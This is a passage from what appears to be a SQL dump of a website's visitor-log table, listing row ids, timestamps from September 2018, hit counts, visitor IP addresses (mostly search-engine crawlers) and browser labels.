7804402,1,1,0,0,'54.36.148.233','other'),(307332,1537804517,1,1,0,0,'66.249.66.156','chrome'),(307333,1537804588,1,1,0,0,'37.9.113.148','other'),(307334,1537805084,1,1,0,0,'207.46.13.164','other'),(307335,1537805136,3,3,0,0,'178.154.244.11','other'),(307336,1537805162,2,2,0,0,'178.154.244.29','other'),(307337,1537805646,1,1,0,0,'91.196.178.93','firefox'),(307338,1537805809,1,1,0,0,'54.36.148.210','other'),(307339,1537805974,1,1,0,0,'216.244.66.241','other'),(307340,1537806061,1,1,0,0,'54.36.149.47','other'),(307341,1537806330,2,2,0,0,'178.154.244.11','other'),(307342,1537806404,2,2,0,0,'178.154.244.29','other'),(307343,1537806669,1,1,0,0,'54.36.148.235','other'),(307344,1537806826,1,1,0,0,'66.249.66.156','chrome'),(307345,1537806866,1,1,0,0,'66.249.66.61','chrome'),(307346,1537806880,1,1,0,0,'5.45.207.19','other'),(307347,1537807237,1,1,0,0,'178.154.244.11','other'),(307348,1537807265,1,1,0,0,'5.45.207.79','other'),(307349,1537807362,1,1,0,0,'54.36.149.27','other'),(307350,1537807472,1,1,0,0,'54.36.149.30','other'),(307351,1537807545,1,1,0,0,'91.196.178.181','chrome'),(307352,1537807641,2,2,0,0,'8.29.198.25','other'),(307353,1537807643,1,1,0,0,'54.36.149.76','other'),(307354,1537808239,1,1,0,0,'37.55.227.225','chrome'),(307355,1537808358,1,1,0,0,'178.154.244.29','other'),(307356,1537809045,1,1,0,0,'66.249.66.157','chrome'),(307357,1537809072,1,1,0,0,'54.36.149.29','other'),(307358,1537809293,1,1,0,0,'180.76.15.163','other'),(307359,1537809422,1,1,0,0,'66.102.9.38','chrome'),(307360,1537809529,1,1,0,0,'54.36.148.33','other'),(307361,1537809844,1,1,0,0,'54.36.148.194','other'),(307362,1537810345,1,1,0,0,'54.36.149.87','other'),(307363,1537810777,1,1,0,0,'54.36.148.13','other'),(307364,1537811275,1,1,0,0,'54.36.148.226','other'),(307365,1537811618,1,1,0,0,'54.36.148.167','other'),(307366,1537811896,1,1,0,0,'54.36.148.186','other'),(307367,1537811904,1,1,0,0,'54.36.149.73','other'),(307368,1537812126,1,1,0,0,'8.29.198.27','other'),(307369,1537812274,2,2,0,0,'216.244.66.241','other'),(307370,1537812301,1,1,0,0,'54.36.149.68','other'),(307371,1537812399,1,1,0,0,'54.36.148.110','other'),(307372,1537812790,2,2,0,0,'178.154.244.29','other'),(307373,1537812888,1,1,0,0,'54.36.148.194','other'),(307374,1537813171,1,1,0,0,'54.36.149.90','other'),(307375,1537813367,1,1,0,0,'54.36.149.33','other'),(307376,1537813815,1,1,0,0,'54.36.148.218','other'),(307377,1537814095,1,1,0,0,'54.36.148.134','other'),(307378,1537814168,1,1,0,0,'54.36.149.106','other'),(307379,1537814265,1,1,0,0,'54.36.149.72','other'),(307380,1537814442,1,1,0,0,'157.55.39.181','other'),(307381,1537814481,1,1,0,0,'31.184.238.25','chrome'),(307382,1537814489,1,1,0,0,'54.36.148.205','other'),(307383,1537814604,1,1,0,0,'54.36.149.44','other'),(307384,1537814740,1,1,0,0,'92.113.189.235','chrome'),(307385,1537814871,1,1,0,0,'54.36.148.164','other'),(307386,1537814944,1,1,0,0,'54.36.149.48','other'),(307387,1537815043,1,1,0,0,'54.36.148.68','other'),(307388,1537815055,1,1,0,0,'66.249.66.155','chrome'),(307389,1537815056,1,1,0,0,'54.36.148.126','other'),(307390,1537815144,1,1,0,0,'54.36.149.95','other'),(307391,1537815153,1,1,0,0,'216.244.66.241','other'),(307392,1537815633,1,1,0,0,'54.36.148.30','other'),(307393,1537816307,1,1,0,0,'54.36.148.159','other'),(307394,1537816336,1,1,0,0,'54.36.148.194','other'),(307395,1537816402,1,1,0,0,'54.36.149.39','other'),(307396,1537816419,1,1,0,0,'176.104.3.182','chrome'),(307397,1537816457,1,1,0,0,'54.36.148.91','other'),(307398,1537817031,1,1,0,0,'54.36.148.203','other'),(307399,1537817113,1,1,0,0,'54.36.148.157','other'),(307400,1537817446,1,1,0,0,'54.36.148.151','other'),(307401,1537817527,1,1,0,0,'66.249.66.39','chrome'),(307402,1537817555,1,1,0,0,'54.36.148.129','other'),(307403,1537817663,1,1,0,0,'216.244.66.241','other'),(307404,1537817709,1,1,0,0,'54.36.149.25','other'),(307405,1537818002,1,1,0,0,'54.36.149.32','other'),(307406,1537818009,1,1,0,0,'54.36.148.230','other'),(307407,1537818052,1,1,0,0,'54.36.149.87','other'),(307408,1537818298,1,1,0,0,'54.36.148.223','other'),(307409,1537818340,1,1,0,0,'54.36.148.84','other'),(307410,1537818470,1,1,0,0,'8.29.198.27','other'),(307411,1537818578,1,1,0,0,'54.36.148.82','other'),(307412,1537818606,1,1,0,0,'54.36.149.73','other'),(307413,1537818609,1,1,0,0,'54.36.148.48','other'),(307414,1537818685,1,1,0,0,'8.29.198.25','other'),(307415,1537818783,1,1,0,0,'66.249.66.156','chrome'),(307416,1537818827,1,1,0,0,'178.251.109.244','chrome'),(307417,1537819293,1,1,0,0,'54.36.149.33','other'),(307418,1537819388,1,1,0,0,'54.36.149.79','other'),(307419,1537819615,1,1,0,0,'54.36.148.203','other'),(307420,1537819941,1,1,0,0,'54.36.149.81','other'),(307421,1537819978,1,1,0,0,'66.249.66.156','chrome'),(307422,1537820243,1,1,0,0,'54.36.148.243','other'),(307423,1537820309,1,1,0,0,'54.36.149.46','other'),(307424,1537820393,1,1,0,0,'54.36.149.60','other'),(307425,1537820495,1,1,0,0,'54.36.149.62','other'),(307426,1537820570,1,1,0,0,'54.36.149.96','other'),(307427,1537820962,1,1,0,0,'54.36.148.81','other'),(307428,1537821143,1,1,0,0,'54.36.148.132','other'),(307429,1537821153,1,1,0,0,'216.244.66.241','other'),(307430,1537821259,1,1,0,0,'54.36.149.105','other'),(307431,1537821309,1,1,0,0,'66.249.66.59','chrome'),(307432,1537821375,1,1,0,0,'54.36.148.208','other'),(307433,1537821793,1,1,0,0,'54.36.148.59','other'),(307434,1537821795,1,1,0,0,'54.36.148.43','other'),(307435,1537821877,1,1,0,0,'54.36.148.62','other'),(307436,1537822240,1,1,0,0,'54.36.149.21','other'),(307437,1537822347,1,1,0,0,'54.36.148.177','other'),(307438,1537822542,1,1,0,0,'54.36.148.180','other'),(307439,1537822634,1,1,0,0,'216.244.66.241','other'),(307440,1537822669,2,2,0,0,'178.154.244.29','other'),(307441,1537822702,1,1,0,0,'207.46.13.164','other'),(307442,1537822739,1,1,0,0,'54.36.148.32','other'),(307443,1537822871,1,1,0,0,'54.36.149.84','other'),(307444,1537822953,1,1,0,0,'8.29.198.25','other'),(307445,1537822967,1,1,0,0,'207.46.13.71','other'),(307446,1537823210,1,1,0,0,'54.36.149.96','other'),(307447,1537823219,1,1,0,0,'54.36.149.21','other'),(307448,1537823255,1,1,0,0,'54.36.149.71','other'),(307449,1537823352,1,1,0,0,'66.249.66.61','chrome'),(307450,1537823596,1,1,0,0,'54.36.148.76','other'),(307451,1537823640,1,1,0,0,'54.36.149.87','other'),(307452,1537823755,1,1,0,0,'54.36.148.106','other'),(307453,1537823838,1,1,0,0,'54.36.148.188','other'),(307454,1537823918,1,1,0,0,'54.36.148.88','other'),(307455,1537824011,1,1,0,0,'54.36.148.34','other'),(307456,1537824131,1,1,0,0,'54.36.148.175','other'),(307457,1537824235,1,1,0,0,'54.36.148.145','other'),(307458,1537824485,1,1,0,0,'54.36.148.27','other'),(307459,1537824667,1,1,0,0,'54.36.149.46','other'),(307460,1537824741,1,1,0,0,'54.36.148.79','other'),(307461,1537824747,1,1,0,0,'91.209.11.236','other'),(307462,1537824810,3,3,0,0,'54.36.149.101','other'),(307463,1537824866,1,1,0,0,'54.36.148.141','other'),(307464,1537824957,1,1,0,0,'66.249.66.155','chrome'),(307465,1537824960,1,1,0,0,'54.36.148.154','other'),(307466,1537824974,1,1,0,0,'54.36.148.207','other'),(307467,1537825023,1,1,0,0,'54.36.148.161','other'),(307468,1537825066,1,1,0,0,'54.36.149.65','other'),(307469,1537825220,1,1,0,0,'157.55.39.181','other'),(307470,1537825317,1,1,0,0,'54.36.148.157','other'),(307471,1537825356,1,1,0,0,'54.36.148.12','other'),(307472,1537825587,1,1,0,0,'54.36.149.105','other'),(307473,1537825686,1,1,0,0,'54.36.148.36','other'),(307474,1537825687,1,1,0,0,'54.36.148.28','other'),(307475,1537825830,1,1,0,0,'54.36.149.44','other'),(307476,1537826157,1,1,0,0,'54.36.148.254','other'),(307477,1537826240,1,1,0,0,'54.36.148.130','other'),(307478,1537826350,1,1,0,0,'54.36.149.95','other'),(307479,1537826894,1,1,0,0,'54.36.149.81','other'),(307480,1537827092,1,1,0,0,'54.36.148.94','other'),(307481,1537827152,1,1,0,0,'54.36.148.230','other'),(307482,1537827283,1,1,0,0,'54.36.148.42','other'),(307483,1537827471,4,4,0,0,'5.9.141.8','other'),(307484,1537827538,1,1,0,0,'54.36.149.57','other'),(307485,1537828042,1,1,0,0,'54.36.148.85','other'),(307486,1537828067,1,1,0,0,'54.36.148.135','other'),(307487,1537828113,1,1,0,0,'54.36.148.19','other'),(307488,1537828521,1,1,0,0,'66.249.66.156','chrome'),(307489,1537828539,1,1,0,0,'54.36.148.33','other'),(307490,1537828686,1,1,0,0,'54.36.148.97','other'),(307491,1537829314,1,1,0,0,'8.29.198.27','other'),(307493,1537829352,2,2,0,0,'216.244.66.241','other'),(307494,1537829384,1,1,0,0,'54.36.148.148','other'),(307495,1537829403,1,1,0,0,'54.36.148.161','other'),(307496,1537829432,1,1,0,0,'54.36.149.0','other'),(307497,1537829516,1,1,0,0,'8.29.198.25','other'),(307498,1537829601,1,1,0,0,'54.36.148.43','other'),(307499,1537829657,1,1,0,0,'54.36.148.247','other'),(307500,1537829909,1,1,0,0,'54.36.148.221','other'),(307501,1537830097,1,1,0,0,'54.36.148.18','other'),(307502,1537830125,1,0,1,0,'66.249.66.156',''),(307503,1537830161,1,1,0,0,'54.36.148.241','other'),(307504,1537830204,1,1,0,0,'54.36.149.2','other'),(307505,1537830337,1,1,0,0,'54.36.148.46','other'),(307506,1537830697,1,1,0,0,'54.36.148.175','other'),(307507,1537831035,3,3,0,0,'178.154.244.11','other'),(307508,1537831209,1,1,0,0,'54.36.148.154','other'),(307509,1537831218,1,1,0,0,'54.36.149.34','other'),(307510,1537831251,1,1,0,0,'54.36.148.61','other'),(307511,1537831439,1,1,0,0,'54.36.148.81','other'),(307512,1537831540,1,1,0,0,'54.36.149.104','other'),(307513,1537831903,1,1,0,0,'216.244.66.241','other'),(307514,1537831916,1,1,0,0,'54.36.148.177','other'),(307515,1537832116,1,1,0,0,'54.36.149.25','other'),(307516,1537832159,6,6,0,0,'178.154.244.29','other'),(307517,1537832226,3,3,0,0,'178.154.244.11','other'),(307518,1537832585,1,1,0,0,'54.36.148.29','other'),(307519,1537832620,1,1,0,0,'54.36.148.186','other'),(307520,1537832642,1,1,0,0,'54.36.149.107','other'),(307521,1537832762,200,200,0,0,'162.208.51.39','firefox'),(307522,1537832929,1,1,0,0,'54.36.149.79','other'),(307523,1537832981,1,1,0,0,'54.36.148.96','other'),(307524,1537832994,11,11,0,0,'162.208.51.39','other'),(307525,1537833087,1,1,0,0,'54.36.148.46','other'),(307526,1537833258,1,1,0,0,'54.36.149.20','other'),(307527,1537833325,1,1,0,0,'5.45.207.79','other'),(307528,1537833326,3,3,0,0,'178.154.244.11','other'),(307529,1537833353,1,1,0,0,'141.8.183.23','other'),(307530,1537833607,1,1,0,0,'54.36.148.157','other'),(307531,1537833790,1,1,0,0,'8.29.198.27','other'),(307532,1537833974,3,3,0,0,'178.154.244.29','other'),(307533,1537833980,2,2,0,0,'95.108.213.4','other'),(307534,1537834162,1,1,0,0,'207.46.13.164','other'),(307535,1537834174,1,1,0,0,'54.36.148.197','other'),(307536,1537834265,1,1,0,0,'54.36.149.61','other'),(307537,1537834548,2,2,0,0,'178.154.244.11','other'),(307538,1537834559,1,1,0,0,'54.36.149.11','other'),(307539,1537834894,2,2,0,0,'178.154.244.29','other'),(307540,1537834920,1,1,0,0,'54.36.148.150','other'),(307541,1537834979,2,2,0,0,'54.36.148.212','other'),(307542,1537835107,1,1,0,0,'54.36.148.204','other'),(307543,1537835128,1,1,0,0,'54.36.148.168','other'),(307544,1537835578,1,1,0,0,'54.36.149.72','other'),(307545,1537835605,1,1,0,0,'54.36.148.94','other'),(307546,1537836133,1,1,0,0,'54.36.149.33','other'),(307547,1537836267,1,1,0,0,'54.36.149.65','other'),(307548,1537836288,1,1,0,0,'54.36.148.75','other'),(307549,1537836379,1,1,0,0,'54.36.148.57','other'),(307550,1537836380,1,1,0,0,'54.36.148.201','other'),(307551,1537836404,1,1,0,0,'54.36.148.13','other'),(307552,1537836561,2,2,0,0,'178.154.244.29','other'),(307553,1537836642,1,1,0,0,'54.36.148.116','other'),(307554,1537836717,1,1,0,0,'54.36.148.163','other'),(307555,1537836796,1,1,0,0,'207.46.13.174','other'),(307556,1537837043,1,1,0,0,'54.36.148.10','other'),(307557,1537837112,1,1,0,0,'207.46.13.164','other'),(307558,1537837321,1,1,0,0,'54.36.148.198','other'),(307559,1537837641,3,3,0,0,'178.154.244.29','other'),(307560,1537837740,1,0,1,0,'66.249.66.156',''),(307561,1537837856,1,1,0,0,'54.36.148.116','other'),(307562,1537837911,1,1,0,0,'54.36.148.246','other'),(307563,1537838038,1,1,0,0,'54.36.148.66','other'),(307564,1537838120,1,1,0,0,'54.36.148.222','other'),(307565,1537838231,1,1,0,0,'54.36.148.179','other'),(307566,1537838461,1,1,0,0,'178.154.244.11','other'),(307567,1537838545,1,1,0,0,'35.162.70.167','chrome'),(307568,1537838846,1,1,0,0,'54.36.148.202','other'),(307569,1537839734,4,4,0,0,'178.154.244.29','other'),(307570,1537840069,1,1,0,0,'201.86.166.19','firefox'),(307571,1537840139,2,2,0,0,'8.29.198.25','other'),(307572,1537840281,1,1,0,0,'54.36.149.12','other'),(307573,1537840318,1,1,0,0,'66.249.66.57','chrome'),(307574,1537840356,1,1,0,0,'54.36.149.63','other'),(307575,1537840594,1,1,0,0,'54.36.149.32','other'),(307576,1537840628,1,1,0,0,'54.36.148.209','other'),(307577,1537840718,2,2,0,0,'178.154.244.29','other'),(307578,1537840888,1,1,0,0,'178.154.244.11','other'),(307579,1537841086,1,1,0,0,'54.36.149.45','other'),(307580,1537841438,1,1,0,0,'54.36.148.104','other'),(307581,1537841658,1,1,0,0,'66.249.64.131','chrome'),(307582,1537841978,1,1,0,0,'141.8.183.23','other'),(307583,1537842519,1,1,0,0,'66.249.64.137','chrome'),(307584,1537843143,1,0,1,0,'66.249.69.41',''),(307585,1537843332,2,2,0,0,'178.154.244.29','other'),(307586,1537844091,1,1,0,0,'207.46.13.164','other'),(307587,1537844623,1,1,0,0,'8.29.198.27','other'),(307588,1537845547,1,1,0,0,'178.154.244.29','other'),(307589,1537845874,1,0,1,0,'66.249.70.29',''),(307590,1537845961,1,1,0,0,'66.249.64.131','chrome'),(307591,1537846818,1,1,0,0,'178.154.244.29','other'),(307592,1537846940,1,1,0,0,'180.76.15.150','other'),(307593,1537847962,1,1,0,0,'180.76.15.142','other'),(307594,1537849800,4,4,0,0,'54.165.59.7','other'),(307595,1537850480,1,1,0,0,'178.154.244.11','other'),(307596,1537850934,1,1,0,0,'54.165.59.7','other'),(307597,1537850973,1,1,0,0,'8.29.198.27','other'),(307598,1537851159,1,1,0,0,'8.29.198.25','other'),(307599,1537851651,1,1,0,0,'178.154.244.11','other'),(307600,1537851861,4,4,0,0,'178.154.244.29','other'),(307601,1537852387,4,4,0,0,'54.165.59.7','other'),(307602,1537852818,1,1,0,0,'78.111.185.150','chrome'),(307603,1537852854,43,43,0,0,'144.76.29.149','other'),(307604,1537852891,2,2,0,0,'216.244.66.241','other'),(307605,1537852904,1,1,0,0,'178.154.244.29','other'),(307606,1537853452,1,1,0,0,'95.163.255.166','other'),(307607,1537853909,1,1,0,0,'54.165.59.7','other'),(307608,1537854362,2,2,0,0,'94.178.105.242','firefox'),(307609,1537854779,1,1,0,0,'180.76.15.13','other'),(307610,1537855059,1,1,0,0,'66.249.64.131','chrome'),(307611,1537855443,1,1,0,0,'91.196.179.138','chrome'),(307612,1537855450,1,1,0,0,'8.29.198.26','other'),(307613,1537855516,1,1,0,0,'216.244.66.241','other'),(307614,1537855594,1,1,0,0,'54.36.148.90','other'),(307615,1537855682,1,1,0,0,'54.36.148.174','other'),(307616,1537855924,1,1,0,0,'54.36.149.47','other'),(307617,1537856093,1,1,0,0,'77.111.244.23','chrome'),(307618,1537856169,1,1,0,0,'54.36.148.255','other'),(307619,1537856549,1,1,0,0,'54.36.148.62','other'),(307620,1537856559,1,1,0,0,'54.36.148.147','other'),(307621,1537856795,1,1,0,0,'176.112.10.4','chrome'),(307622,1537856860,1,1,0,0,'54.36.149.91','other'),(307623,1537857146,1,1,0,0,'91.196.178.169','firefox'),(307624,1537857152,1,1,0,0,'54.36.149.14','other'),(307625,1537857232,1,1,0,0,'54.36.149.74','other'),(307626,1537857405,1,1,0,0,'54.36.148.39','other'),(307627,1537857411,1,1,0,0,'54.36.148.149','other'),(307628,1537857456,1,1,0,0,'91.196.178.169','chrome'),(307629,1537857459,1,0,1,0,'66.249.70.29',''),(307630,1537857540,1,1,0,0,'54.36.149.44','other'),(307631,1537857684,2,2,0,0,'92.113.189.235','firefox'),(307632,1537857970,1,1,0,0,'195.137.227.76','chrome'),(307633,1537858082,1,1,0,0,'54.36.148.229','other'),(307634,1537858171,1,1,0,0,'54.36.148.33','other'),(307635,1537858276,1,1,0,0,'54.36.148.194','other'),(307636,1537858355,1,1,0,0,'54.36.148.85','other'),(307637,1537858365,1,1,0,0,'54.36.148.164','other'),(307638,1537858500,1,1,0,0,'54.36.148.204','other'),(307639,1537858634,1,1,0,0,'178.94.16.193','chrome'),(307640,1537858723,1,1,0,0,'54.36.149.61','other'),(307641,1537858724,1,1,0,0,'91.196.178.97','chrome'),(307642,1537858732,1,1,0,0,'178.154.244.29','other'),(307643,1537858807,1,1,0,0,'54.36.148.91','other'),(307644,1537858830,1,1,0,0,'54.36.148.120','other'),(307645,1537858963,1,1,0,0,'54.36.149.90','other'),(307646,1537859329,1,1,0,0,'54.36.149.58','other'),(307647,1537859335,1,1,0,0,'207.46.13.174','other'),(307648,1537859338,2,2,0,0,'207.46.13.164','other'),(307649,1537859344,7,7,0,0,'207.46.13.71','other'),(307650,1537859352,1,1,0,0,'157.55.39.181','other'),(307651,1537859472,1,1,0,0,'54.36.148.48','other'),(307652,1537859520,1,1,0,0,'54.36.148.11','other'),(307653,1537859959,1,1,0,0,'54.36.148.217','other'),(307654,1537860209,1,1,0,0,'54.36.148.107','other'),(307655,1537860455,1,1,0,0,'54.36.148.156','other'),(307656,1537860691,1,1,0,0,'54.36.148.77','other'),(307657,1537861064,1,1,0,0,'54.36.148.95','other'),(307658,1537861213,1,1,0,0,'54.36.148.230','other'),(307659,1537861321,1,1,0,0,'54.36.148.185','other'),(307660,1537861432,1,1,0,0,'54.36.149.29','other'),(307661,1537861551,3,3,0,0,'62.205.134.182','other'),(307662,1537861566,1,1,0,0,'54.36.148.203','other'),(307663,1537861593,1,1,0,0,'178.154.244.11','other'),(307664,1537861807,1,1,0,0,'8.29.198.26','other'),(307665,1537861911,1,1,0,0,'54.36.148.254','other'),(307666,1537861986,1,1,0,0,'8.29.198.27','other'),(307667,1537862121,1,1,0,0,'54.36.148.186','other'),(307668,1537862136,1,1,0,0,'54.36.148.123','other'),(307669,1537862361,1,1,0,0,'54.36.148.134','other'),(307670,1537862808,1,1,0,0,'54.36.149.75','other'),(307671,1537862862,2,2,0,0,'62.205.134.182','other'),(307672,1537862898,1,1,0,0,'54.36.149.7','other'),(307673,1537863027,1,1,0,0,'54.36.148.190','other'),(307674,1537863087,1,1,0,0,'54.36.148.116','other'),(307675,1537863300,1,1,0,0,'54.36.148.85','other'),(307676,1537863303,1,1,0,0,'54.36.148.222','other'),(307677,1537863341,1,1,0,0,'91.196.178.72','firefox'),(307678,1537863455,1,1,0,0,'216.244.66.241','other'),(307679,1537863561,1,1,0,0,'54.36.148.46','other'),(307680,1537863573,1,1,0,0,'91.196.177.176','chrome'),(307681,1537863603,1,1,0,0,'54.36.149.10','other'),(307682,1537863966,1,1,0,0,'54.36.149.13','other'),(307683,1537864059,1,1,0,0,'54.36.148.150','other'),(307684,1537864095,1,1,0,0,'91.196.178.169','chrome'),(307685,1537864240,1,1,0,0,'92.244.99.158','chrome'),(307686,1537864780,1,1,0,0,'54.36.148.164','other'),(307687,1537864985,1,1,0,0,'54.36.149.94','other'),(307688,1537865797,1,1,0,0,'35.202.99.105','other'),(307689,1537866158,2,2,0,0,'62.205.134.182','other'),(307690,1537866285,1,1,0,0,'8.29.198.25','other'),(307691,1537866685,1,1,0,0,'207.46.13.164','other'),(307692,1537867032,1,1,0,0,'95.132.53.199','chrome'),(307693,1537867764,1,1,0,0,'178.62.137.173','chrome'),(307694,1537867846,1,1,0,0,'216.244.66.241','other'),(307695,1537868062,1,1,0,0,'5.9.155.37','other'),(307696,1537868265,1,1,0,0,'207.46.13.164','other'),(307697,1537868291,1,1,0,0,'178.94.49.71','chrome'),(307698,1537868404,1,1,0,0,'91.196.177.110','firefox'),(307699,1537868515,1,1,0,0,'54.36.148.200','other'),(307700,1537868593,1,1,0,0,'91.196.177.134','chrome'),(307701,1537868986,1,1,0,0,'95.132.53.199','chrome'),(307702,1537869530,1,1,0,0,'54.36.148.157','other'),(307703,1537869608,1,1,0,0,'54.36.149.30','other'),(307704,1537869773,1,1,0,0,'54.36.149.63','other'),(307705,1537869838,1,1,0,0,'95.163.255.189','other'),(307706,1537869893,1,1,0,0,'54.36.149.56','other'),(307707,1537870192,1,1,0,0,'54.36.148.135','other'),(307708,1537870240,1,1,0,0,'54.36.149.96','other'),(307709,1537870471,1,1,0,0,'54.36.148.15','other'),(307710,1537870500,1,1,0,0,'180.76.15.142','other'),(307711,1537870566,1,1,0,0,'54.36.148.126','other'),(307712,1537870738,1,1,0,0,'54.36.148.204','other'),(307713,1537870971,1,1,0,0,'54.36.148.83','other'),(307714,1537871104,1,1,0,0,'54.36.148.162','other'),(307715,1537871175,1,1,0,0,'54.36.148.19','other'),(307716,1537871519,1,1,0,0,'54.36.148.220','other'),(307717,1537871646,1,1,0,0,'54.36.149.74','other'),(307718,1537871812,1,1,0,0,'54.36.148.170','other'),(307719,1537871864,1,1,0,0,'54.36.148.104','other'),(307720,1537871892,1,1,0,0,'91.231.40.160','chrome'),(307721,1537872003,1,1,0,0,'216.244.66.241','other'),(307722,1537872245,2,2,0,0,'54.36.148.230','other'),(307723,1537872642,1,1,0,0,'8.29.198.26','other'),(307724,1537872666,1,1,0,0,'54.36.148.115','other'),(307725,1537872813,1,1,0,0,'8.29.198.27','other'),(307726,1537872935,1,0,1,0,'66.249.70.29',''),(307727,1537873366,1,1,0,0,'54.36.149.51','other'),(307728,1537873502,1,1,0,0,'54.36.149.28','other'),(307729,1537873997,2,2,0,0,'216.244.66.241','other'),(307730,1537874032,1,1,0,0,'54.36.148.229','other'),(307731,1537874318,1,1,0,0,'178.154.244.11','other'),(307732,1537874322,1,1,0,0,'178.154.244.29','other'),(307733,1537874766,1,1,0,0,'66.249.64.137','chrome'),(307734,1537874920,1,1,0,0,'54.36.149.75','other'),(307735,1537875005,1,1,0,0,'54.36.149.100','other'),(307736,1537875011,1,1,0,0,'207.46.13.164','other'),(307737,1537875023,1,1,0,0,'54.36.148.148','other'),(307738,1537875292,1,1,0,0,'54.36.148.146','other'),(307739,1537875312,1,1,0,0,'54.36.148.130','other'),(307740,1537875814,1,1,0,0,'54.36.148.173','other'),(307741,1537875884,2,2,0,0,'54.36.148.190','other'),(307742,1537876262,1,1,0,0,'95.132.53.199','chrome'),(307743,1537876393,1,1,0,0,'216.244.66.241','other'),(307744,1537876532,1,1,0,0,'92.113.189.235','chrome'),(307745,1537876594,1,1,0,0,'207.46.13.71','other'),(307746,1537877011,1,1,0,0,'54.36.148.232','other'),(307747,1537877036,1,1,0,0,'54.36.149.78','other'),(307748,1537877049,1,1,0,0,'54.36.149.45','other'),(307749,1537877054,1,1,0,0,'54.36.149.89','other'),(307750,1537877066,1,1,0,0,'91.196.178.136','firefox'),(307751,1537877120,1,1,0,0,'8.29.198.27','other'),(307752,1537877149,1,1,0,0,'54.36.148.17','other'),(307753,1537877351,1,1,0,0,'54.36.148.226','other'),(307754,1537877413,1,1,0,0,'95.132.53.199','chrome'),(307755,1537877523,1,1,0,0,'52.53.201.78','chrome'),(307756,1537877654,1,1,0,0,'54.36.148.73','other'),(307757,1537877824,1,1,0,0,'194.37.248.11','chrome'),(307758,1537877870,1,1,0,0,'54.36.149.62','other'),(307759,1537877941,1,1,0,0,'34.222.99.145','chrome'),(307760,1537878120,1,1,0,0,'54.36.148.120','other'),(307761,1537878190,1,1,0,0,'62.205.134.182','other'),(307762,1537878272,2,0,2,0,'66.249.64.131',''),(307763,1537878490,2,2,0,0,'37.55.9.246','chrome'),(307764,1537878508,1,1,0,0,'54.36.148.107','other'),(307765,1537878610,1,1,0,0,'54.36.148.201','other'),(307766,1537878620,1,1,0,0,'54.36.148.207','other'),(307767,1537878625,1,1,0,0,'54.36.148.38','other'),(307768,1537878890,2,2,0,0,'54.36.148.222','other'),(307769,1537878915,1,1,0,0,'54.36.148.93','other'),(307770,1537878983,1,1,0,0,'54.36.148.84','other'),(307771,1537878990,1,1,0,0,'54.36.148.170','other'),(307772,1537879021,1,1,0,0,'54.36.148.60','other'),(307773,1537879140,1,1,0,0,'54.36.149.102','other'),(307774,1537879194,1,1,0,0,'54.36.149.44','other'),(307775,1537879248,1,1,0,0,'95.132.53.199','chrome'),(307776,1537879325,1,1,0,0,'54.36.148.62','other'),(307777,1537879332,1,1,0,0,'54.36.148.39','other'),(307778,1537879500,1,1,0,0,'54.36.148.40','other'),(307779,1537879834,1,1,0,0,'37.54.99.190','chrome'),(307780,1537879851,1,1,0,0,'54.36.149.33','other'),(307781,1537879956,1,1,0,0,'91.196.178.167','chrome'),(307782,1537880059,1,1,0,0,'54.36.148.197','other'),(307783,1537880306,1,1,0,0,'54.36.148.92','other'),(307784,1537880426,1,1,0,0,'54.36.148.14','other'),(307785,1537880666,1,1,0,0,'37.55.64.253','chrome'),(307786,1537880724,1,1,0,0,'66.249.64.137','chrome'),(307787,1537880786,1,1,0,0,'54.36.148.95','other'),(307788,1537881304,1,1,0,0,'54.36.149.28','other'),(307789,1537881334,1,1,0,0,'54.36.149.39','other'),(307790,1537881461,1,1,0,0,'54.36.149.64','other'),(307791,1537881527,1,1,0,0,'216.244.66.241','other'),(307792,1537881730,1,1,0,0,'54.36.148.233','other'),(307793,1537881787,1,1,0,0,'54.36.148.158','other'),(307794,1537882019,1,1,0,0,'54.36.148.124','other'),(307795,1537882148,1,1,0,0,'54.36.149.94','other'),(307796,1537882790,1,1,0,0,'54.36.149.13','other'),(307797,1537882998,1,1,0,0,'54.36.149.14','other'),(307798,1537883070,1,1,0,0,'91.196.178.69','chrome'),(307799,1537883284,1,1,0,0,'54.36.148.11','other'),(307800,1537883419,1,1,0,0,'54.36.148.223','other'),(307801,1537883483,1,1,0,0,'8.29.198.25','other'),(307802,1537883514,1,0,1,0,'66.249.64.131',''),(307803,1537883546,1,1,0,0,'54.36.149.41','other'),(307804,1537883573,1,1,0,0,'54.36.148.217','other'),(307805,1537883574,1,1,0,0,'54.36.148.227','other'),(307806,1537883658,1,1,0,0,'8.29.198.26','other'),(307807,1537883660,1,1,0,0,'54.36.149.48','other'),(307808,1537884006,1,1,0,0,'54.36.148.176','other'),(307809,1537884192,1,0,1,0,'66.249.64.135',''),(307810,1537884366,1,1,0,0,'54.36.148.25','other'),(307811,1537884479,1,1,0,0,'54.36.148.28','other'),(307812,1537884854,1,1,0,0,'54.36.148.70','other'),(307813,1537884934,1,1,0,0,'91.196.178.93','firefox'),(307814,1537884980,1,1,0,0,'195.62.14.74','chrome'),(307815,1537886014,1,1,0,0,'54.36.149.53','other'),(307816,1537886178,1,1,0,0,'54.36.148.232','other'),(307817,1537886187,1,1,0,0,'54.36.148.103','other'),(307818,1537886489,1,1,0,0,'54.36.148.148','other'),(307819,1537886622,1,1,0,0,'35.202.99.105','other'),(307820,1537886891,1,1,0,0,'82.207.32.134','chrome'),(307821,1537887075,1,1,0,0,'178.154.244.29','other'),(307822,1537887087,1,1,0,0,'178.154.244.11','other'),(307823,1537887105,1,1,0,0,'54.36.148.33','other'),(307824,1537887124,1,1,0,0,'54.36.148.181','other'),(307825,1537887184,1,1,0,0,'46.201.250.174','chrome'),(307826,1537887205,1,1,0,0,'54.36.148.73','other'),(307827,1537887280,1,1,0,0,'54.36.149.36','other'),(307828,1537887462,1,1,0,0,'54.36.149.93','other'),(307829,1537887506,1,1,0,0,'54.36.148.24','other'),(307830,1537887550,1,1,0,0,'54.36.148.172','other'),(307831,1537887748,1,1,0,0,'91.196.178.45','chrome'),(307832,1537887761,1,1,0,0,'54.36.148.237','other'),(307833,1537887791,1,1,0,0,'54.36.148.25','other'),(307834,1537887940,1,1,0,0,'54.36.148.128','other'),(307835,1537887950,1,1,0,0,'8.29.198.26','other'),(307836,1537887988,1,1,0,0,'54.36.149.79','other'),(307837,1537888532,1,1,0,0,'54.36.148.99','other'),(307838,1537888637,1,1,0,0,'54.36.148.187','other'),(307839,1537888684,1,1,0,0,'54.36.148.158','other'),(307840,1537888895,1,1,0,0,'46.219.77.169','chrome'),(307841,1537889195,1,1,0,0,'207.46.13.71','other'),(307842,1537889273,1,1,0,0,'54.36.149.92','other'),(307843,1537889328,1,1,0,0,'54.36.148.37','other'),(307844,1537889428,1,1,0,0,'54.36.149.